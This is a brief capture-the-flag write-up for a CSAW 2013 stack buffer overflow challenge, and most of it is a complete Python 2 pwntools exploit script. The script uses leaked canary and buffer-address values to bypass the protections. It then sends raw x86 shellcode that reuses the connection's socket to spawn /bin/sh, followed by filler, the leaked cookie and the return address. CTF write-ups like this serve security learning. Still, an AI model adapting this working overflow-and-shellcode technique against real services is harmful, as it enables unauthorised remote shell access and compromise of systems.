Csaw 2013
This problem had a buffer overflow and no protection except ASLR; it had a custom-made canary, and it also leaked the canary value and the address of the buffer.
Everything was made simple; the problem here was that it was forking a connection, so normal shellcode would yield a shell in the parent process, not in the child, which was of no use to us.
Re-use-fd shellcode, which binds a shell to our current socket ... that's it!!!
from pwn import *
# Exploit script for the CSAW 2013 challenge described above.  The service
# sends the buffer address and the custom cookie value before anything else,
# and those two leaks are what make its ASLR and canary ineffective here.
# Written in Python 2 (print statements, str payloads).
r=remote('0.0.0.0',31338)
# First 4 bytes from the service: the address of the buffer, unpacked with
# pwntools' default word settings.
buff=r.recv(4)
buff=unpack(buff)
print "[+] Adress of buffer ="+str(hex(buff))
# Next 4 bytes: the leaked cookie (canary) value.
cookie=r.recv(4)
cookie=unpack(cookie)
print "[+] Value of Cookie ="+str(hex(cookie))
# Consume the prompt up to and including ':' before sending anything.
msg=r.recvuntil(':')
print msg
#raw_input("wait")
# Payload layout, in order: the fd-reusing shellcode bytes, 1991 filler bytes
# (0x90), the leaked cookie, 12 more filler bytes, then the leaked buffer
# address.  The filler lengths are specific to this binary's stack layout.
payload="\x54\x59\x6a\x7f\x54\x51\x6a\x7f\x54\x59\x6a\x07\x5b\xff\x09\x6a\x66\x58\xcd\x80\x85\xc0\x75\xf5\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x41\x31\xd2\x51\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x6a\x0b\x58\xcd\x80"+"\x90"*1991+pack(cookie)+"\x90"*12+pack(buff)
r.send(payload)
# Hand the socket over to the user once the payload has been delivered.
r.interactive()